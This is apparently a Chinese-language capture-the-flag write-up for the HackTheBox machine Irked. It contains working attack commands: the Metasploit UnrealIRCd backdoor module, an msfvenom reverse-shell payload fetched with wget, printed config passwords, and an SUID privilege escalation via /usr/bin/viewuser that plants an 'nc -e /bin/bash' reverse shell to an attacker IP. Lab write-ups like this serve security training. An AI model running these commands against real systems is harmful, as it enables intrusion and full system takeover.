Irked(suid提权)

info:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
nmap -sS -Pn IP
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
111/tcp open  rpcbind 2-4 (RPC #100000)


22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
49074/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd

80

1
2
3
<img src=irked.jpg>
<br>
<b><center>IRC is almost working!</b></center>

Apache/2.4.10

10.10.10.117/manual/images/

IRC

1
2
3
4
5
6
7
8
searchsploit UnrealIRCd

浏览器访问以下地址,6697获得了一条信息:“ERROR :Closing Link: [10.10.14.13] (Throttled: Reconnecting too fast) -Email djmardov@irked.htb for more information.”
10.10.10.117:6697
10.10.10.117:8067
10.10.10.117:65534

search UnrealIRCd

irc.rc

3

msfconsole -r irc.rc

1
2
3
4
5
6
7
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOST IP
set RPORT 6697
run

shell
python -c 'import pty; pty.spawn("/bin/bash")'

获得一个shell find . -name "user.txt" 2>/dev/null 尝试获得user.txt,权限不够

提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
os : Linux irked 3.16.0-6-686-pae #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) i686 GNU/Linux

pwd:  /home/ircd/Unreal3.2

whoami : ircd

cat /etc/passwd | grep home
djmardov:x:1000:1000:djmardov,,,:/home/djmardov:/bin/bash
ircd:x:1001:1001::/home/ircd:/bin/sh

cd /;find . -name "user.txt" 2>/dev/null
./home/djmardov/Documents/user.txt

python -c 'import pty; pty.spawn("/bin/bash")'
su djmardov

cat unrealircd.conf | grep pass
获得疑似口令:f00Ness、f00、moocowsrulemyworld、LiNk

find . -name "id_rsa" 2>/dev/null
find . -name "*.pub"找到了一个路径,查看ssh配置文件

gcc -v
gcc version 4.9.2 (Debian 4.9.2-10+deb8u1)

sudo not found

尝试1

Linux Kernel 3.0 < 3.3.5 提权失败 4

use post/multi/recon/local_exploit_suggester没有发现任何可用exp

尝试2

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=7766 -f elf -o payload.elf

wget http://10.10.14.7/payload.elf

1

local_exploit_suggester,有收获,但exp执行不成功

1
2
3
[+] 10.10.10.117 - exploit/linux/local/network_manager_vpnc_username_priv_esc: The target service is running, but could not be validated.
[+] 10.10.10.117 - exploit/linux/local/pkexec: The target service is running, but could not be validated.
[*] Post module execution completed

尝试3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
python -m SimpleHTTPServer 8088
wget http://10.10.14.7:8088/linux-exploit-suggester.sh

./linux-exploit-suggester.sh

Available information:

Kernel version: 3.16.0
Architecture: i686
Distribution: debian
Distribution version: 8
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

---
searchsploit linux 3.16

- 尝试shell脚本提示可能有的漏洞dirtyc0w.c
- CVE-2017-7533
失败

尝试4

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
root@irked:/tmp# file /usr/bin/viewuser
file /usr/bin/viewuser
/usr/bin/viewuser: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=69ba4bc75bf72037f1ec492bc4cde2550eeac4bb, not stripped

strings /usr/bin/viewuser
发现里面有一个/tmp/listusers,查看一下是ascii字符,内容为/bin/bash

---

file /tmp/listusers
/tmp/listusers: ASCII text

cat /tmp/listusers
/bin/bash

---

ls -al /tmp/listusers
-rwxr-xr-x 1 djmardov djmardov 10 Mar  9 14:58 /tmp/listusers

/usr/bin/viewuser
cd /usr/bin/; ./viewuser

This application is being devleoped to set and test user permissions
It is still being actively developed 它仍在积极开发中
(unknown) :0           2019-03-09 14:53 (:0)

rm /tmp/listusers
./viewuser 

11


ps -ef | grep viewuser

12

虽然是以ircd用户运行的viewuser,可以看到进程是以root用户执行的


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
whereis nc
nc -h
echo "/bin/bash  nc -e /bin/bash 10.10.14.7 2233" >/tmp/listusers
cat /tmp/listusers

/bin/bash  nc -e /bin/bash 10.10.14.7 2233

本地运行nc -lnvp 2233

cd /usr/bin/; ./viewuser
结果:sh: 1: /tmp/listusers: Permission denied

ls -al /tmp/listusers
-rw------- 1 root ircd 43 Mar 10 03:54 /tmp/listusers

chmod +x /tmp/listusers

ls -al /tmp/listusers
-rwx------  1 root ircd   43 Mar 10 03:58 listusers

cd /usr/bin/; ./viewuser
结果
/bin/nc: /bin/nc: cannot execute binary file

nc -e /bin/bash 10.10.14.7 2233

13